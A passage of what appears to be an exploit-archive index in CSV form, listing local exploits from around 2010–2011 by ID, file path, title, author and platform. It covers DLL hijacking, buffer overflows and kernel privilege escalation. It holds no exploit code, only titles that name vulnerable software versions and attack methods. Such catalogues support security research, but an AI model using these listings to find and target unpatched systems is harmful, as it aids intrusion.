1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, +14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, +14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",local,hardware, +14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows, +14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows, +14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows, +14731,exploits/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,local,windows, +14732,exploits/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows, +14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows, +14734,exploits/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows, +14735,exploits/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows, +14744,exploits/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14746,exploits/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14747,exploits/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14739,exploits/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,local,windows, +14740,exploits/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,local,windows, +14741,exploits/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,local,windows, +14743,exploits/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,local,windows, +14748,exploits/windows/local/14748.txt,"uTorrent 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,local,windows, +14750,exploits/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,local,windows, +14751,exploits/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking",2010-08-25,"Beenu Arora",local,windows, +14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14756,exploits/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,local,windows, +14753,exploits/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14754,exploits/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14755,exploits/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14762,exploits/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,local,windows, +14758,exploits/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows, +14764,exploits/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows, +14765,exploits/windows/local/14765.c,"Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows, +14766,exploits/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows, +14769,exploits/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows, +14771,exploits/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14772,exploits/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14773,exploits/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14774,exploits/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,local,windows, +14775,exploits/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",local,windows, +14778,exploits/windows/local/14778.c,"Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking",2010-08-25,storm,local,windows, +14780,exploits/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,local,windows, +14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows, +14782,exploits/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,local,windows, +14783,exploits/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,local,windows, +14784,exploits/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14785,exploits/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14786,exploits/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14787,exploits/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14788,exploits/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14789,exploits/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows, +14791,exploits/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",local,windows, +14793,exploits/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",local,windows, +14814,exploits/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation",2010-08-27,"Jon Oberheide",local,linux, +14830,exploits/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption",2010-08-29,"Aaron Conole",local,linux, +14831,exploits/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",local,windows, +14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,local,windows, +14966,exploits/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,local,windows, +14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows, +14961,exploits/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Local Overflow (SEH)",2010-09-09,"Abhishek Lyall",local,win_x86, +14982,exploits/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,local,windows, +15013,exploits/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH)",2010-09-15,"sanjeev gupta",local,windows, +15022,exploits/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",local,windows, +15023,exploits/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",local,lin_x86-64, +15024,exploits/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation",2010-09-16,Ac1dB1tCh3z,local,lin_x86-64, +15026,exploits/windows/local/15026.py,"BACnet OPC Client - Local Buffer Overflow (1)",2010-09-16,"Jeremy Brown",local,windows, +15031,exploits/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Local Overflow (SEH)",2010-09-17,"Abhishek Lyall",local,windows, +15033,exploits/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,local,windows, +15047,exploits/windows/local/15047.rb,"Audiotran 1.4.2.4 - Local Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",local,windows, +15099,exploits/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",local,windows, +15069,exploits/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Local Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",local,windows, +15074,exploits/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,local,linux, +15081,exploits/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Local Overflow (SEH) (Metasploit)",2010-09-22,Madjix,local,windows, +15094,exploits/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,local,windows, +15133,exploits/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Local Overflow (SEH)",2010-09-27,"sanjeev gupta",local,windows, +15134,exploits/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Local Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",local,windows, +15150,exploits/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",local,linux, +15155,exploits/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",local,linux, +15156,exploits/windows/local/15156.py,"Quick Player 1.3 - Unicode (SEH)",2010-09-29,"Abhishek Lyall",local,windows, +15184,exploits/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP",2010-10-02,x90c,local,windows, +15201,exploits/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",local,windows, +15206,exploits/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",local,bsd, +15285,exploits/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation",2010-10-19,"Dan Rosenberg",local,linux, +15599,exploits/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Local Buffer Overflow",2010-11-23,0v3r,local,windows, +15609,exploits/windows/local/15609.txt,"Microsoft Windows Vista/7 - Local Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,local,windows, +15274,exploits/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",local,linux, +15279,exploits/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Local Buffer Overflow (SEH)",2010-10-18,"James Fitts",local,windows, +15287,exploits/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow",2010-10-19,Mighty-D,local,windows, +15304,exploits/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation",2010-10-22,"Tavis Ormandy",local,linux, +15312,exploits/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow",2010-10-25,"Mighty-D & 7eK",local,windows, +15344,exploits/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",local,linux, +15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows, +15403,exploits/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - 'users.txt' Local Buffer Overflow",2010-11-02,"Chris Gabriel",local,windows, +15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows, +15417,exploits/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Local Buffer Overflow",2010-11-04,moigai,local,windows, +15461,exploits/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel",2010-11-08,"Nikita Tarakanov",local,windows, +15475,exploits/multiple/local/15475.txt,"IBM OmniFind - Local Privilege Escalation",2010-11-09,"Fatih Kilic",local,multiple, +15480,exploits/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Local Buffer Overflow",2010-11-10,"C4SS!0 G0M3S",local,windows, +15481,exploits/linux/local/15481.c,"Linux Kernel 2.4.0 - Stack Infoleaks",2010-11-10,"Dan Rosenberg",local,linux, +15483,exploits/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Local Buffer Overflow (SEH)",2010-11-10,"C4SS!0 G0M3S",local,windows, +15489,exploits/windows/local/15489.py,"MP3-Nator 2.0 - Local Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",local,windows, +15532,exploits/windows/local/15532.py,"Foxit Reader 4.1.1 - Local Stack Buffer Overflow",2010-11-14,sud0,local,windows, +15539,exploits/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Local Buffer Overflow",2010-11-14,BraniX,local,windows, +15540,exploits/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Local Buffer Overflow",2010-11-14,BraniX,local,windows, +15541,exploits/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Local Buffer Overflow",2010-11-14,BraniX,local,windows, +15542,exploits/windows/local/15542.py,"Foxit Reader 4.1.1 - Local Stack Overflow (Egghunter)",2010-11-15,dookie,local,windows, +15566,exploits/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,local,windows, +15569,exploits/windows/local/15569.rb,"MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",local,windows, +15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,local,windows, +15584,exploits/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation",2010-11-20,LiquidWorm,local,windows, +15589,exploits/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,local,windows, +15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux, +15624,exploits/windows/local/15624.txt,"CA Internet Security Suite 2010 - 'KmxSbx.sys' Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",local,windows, +15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows, +15630,exploits/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Local Buffer Overflow (SEH)",2010-11-29,0v3r,local,windows, +15663,exploits/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",local,windows, +15692,exploits/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Local Buffer Overflow (SEH)",2010-12-06,"xsploited security",local,windows, +15693,exploits/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Code Execution",2010-12-06,Rew,local,windows, +15696,exploits/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,local,windows, +15704,exploits/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",local,linux, +15706,exploits/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",local,windows, +15745,exploits/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Local Privilege Escalation",2010-12-15,"Kryptos Logic",local,linux, +15727,exploits/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Local Buffer Overflow",2010-12-11,zota,local,windows, +15729,exploits/windows/local/15729.py,"PowerShell XP 3.0.1 - Local Buffer Overflow",2010-12-12,m_101,local,windows, +15730,exploits/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",local,windows, +15747,exploits/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Local Buffer Overflow",2010-12-16,xsploitedsec,local,windows, +15751,exploits/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Local Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",local,windows, +15761,exploits/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 < 1.2.0.4 - Local Privilege Escalation",2010-12-17,MJ0011,local,windows, +15762,exploits/windows/local/15762.txt,"NProtect Anti-Virus 2007 < 2010.5.11.1 - Local Privilege Escalation",2010-12-17,MJ0011,local,windows, +15763,exploits/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Local Privilege Escalation",2010-12-17,MJ0011,local,windows, +15764,exploits/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 < 2008.8.1.1 - Local Privilege Escalation",2010-12-17,MJ0011,local,windows, +15774,exploits/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation",2010-12-18,"Jon Oberheide",local,linux, +15782,exploits/windows/local/15782.pl,"Word Splash Pro 9.5 - Local Buffer Overflow",2010-12-20,h1ch4m,local,windows, +15785,exploits/windows/local/15785.py,"MP3 CD Converter Professional - Local Buffer Overflow (SEH)",2010-12-20,"C4SS!0 G0M3S",local,windows, +15855,exploits/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH)",2010-12-29,"Abhishek Lyall",local,windows, +15895,exploits/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,local,windows, +15888,exploits/windows/local/15888.c,"Bywifi 2.8.1 - Local Stack Buffer Overflow",2011-01-01,anonymous,local,windows, +15901,exploits/windows/local/15901.py,"Music Animation Machine MIDI Player - Local Buffer Overflow (SEH)",2011-01-04,Acidgen,local,windows, +15916,exploits/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",local,lin_x86, +15919,exploits/windows/local/15919.pl,"Enzip 3.00 - Local Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",local,windows, +15934,exploits/windows/local/15934.py,"BS.Player 2.57 - Local Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",local,windows, +15936,exploits/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,local,windows, +15941,exploits/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow (SEH)",2011-01-08,fdiskyou,local,windows, +15944,exploits/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)",2011-01-08,"Joe Sylve",local,linux, +15962,exploits/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation",2011-01-10,peri.carding,local,solaris, +15972,exploits/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM",2011-01-11,mu-b,local,windows, +16264,exploits/windows/local/16264.pl,"Magic Music Editor - Local Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",local,windows, +15975,exploits/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Local Overflow (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",local,windows, +15985,exploits/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",local,windows, +15994,exploits/windows/local/15994.rb,"eXtremeMP3 Player - Local Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",local,windows, +16009,exploits/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow",2011-01-18,h1ch4m,local,windows, +17210,exploits/windows/local/17210.rb,"eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,local,windows, +16024,exploits/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption",2011-01-24,"Luigi Auriemma",local,windows, +16070,exploits/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX Buffer Overflow (SEH)",2011-01-28,Acidgen,local,windows, +16071,exploits/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler Cross-Site Scripting",2011-01-29,80vul,local,windows, +16072,exploits/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' File Buffer Overflow (DEP Bypass)",2011-01-29,sickness,local,windows, +16073,exploits/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow (SEH)",2011-01-29,m0nna,local,windows, +16083,exploits/windows/local/16083.rb,"NetZip - Classic Buffer Overflow (SEH)",2011-01-30,"C4SS!0 G0M3S",local,windows, +16085,exploits/windows/local/16085.py,"AOL 9.5 - '.rtx' Local Buffer Overflow",2011-01-31,sup3r,local,windows, +16086,exploits/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",local,linux, +16092,exploits/windows/local/16092.py,"CodeBlocks 8.02 - 'cbp' Local Buffer Overflow",2011-02-01,sup3r,local,windows, +16098,exploits/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Privilege Escalation",2011-02-02,"The Android Exploid Crew",local,android, +16099,exploits/android/local/16099.c,"Google Android 1.x/2.x - Local Privilege Escalation",2011-02-02,"The Android Exploid Crew",local,android, +16107,exploits/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Local Buffer Overflow",2011-02-03,sickness,local,windows, +16119,exploits/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak",2011-02-06,kingcope,local,freebsd, +16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows, +16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows, +16138,exploits/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM",2011-02-09,mu-b,local,windows, +16141,exploits/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,local,windows, +16153,exploits/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Local Buffer Overflow",2011-02-11,sickness,local,windows, +16162,exploits/windows/local/16162.pl,"CuteZip 2.1 - Local Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",local,windows, +16169,exploits/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC)",2011-02-15,mr_me,local,windows, +16173,exploits/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,local,windows, +16253,exploits/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Local Buffer Overflow",2011-02-27,sickness,local,windows, +16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple, +41804,exploits/multiple/local/41804.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",local,multiple, +40435,exploits/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit)",2016-09-27,Metasploit,local,lin_x86, +16503,exploits/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,local,windows, +16504,exploits/windows/local/16504.rb,"Adobe - 'util.printf()' Local Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,local,windows, +16531,exploits/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, +16546,exploits/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,local,windows, +16556,exploits/windows/local/16556.rb,"XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)",2010-05-09,Metasploit,local,windows, +16562,exploits/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,local,windows, +16589,exploits/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,local,windows, +16593,exploits/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,local,windows, +41786,exploits/linux/local/41786.rb,"Bluecoat ASG 6.6/CAS 1.3 - Local Privilege Escalation (Metasploit)",2017-04-03,"Chris Hebert",local,linux, +16606,exploits/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,local,windows, +16614,exploits/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,local,windows, +16615,exploits/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,local,windows, +16617,exploits/windows/local/16617.rb,"VUPlayer - '.m3u' Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16618,exploits/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16619,exploits/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Local Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16621,exploits/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,local,windows, +16622,exploits/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16623,exploits/windows/local/16623.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16624,exploits/windows/local/16624.rb,"Adobe - 'util.printf()' Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16625,exploits/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)",2010-09-25,Metasploit,local,windows, +16626,exploits/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,local,windows, +16627,exploits/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, +16628,exploits/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16629,exploits/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,local,windows, +16631,exploits/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' 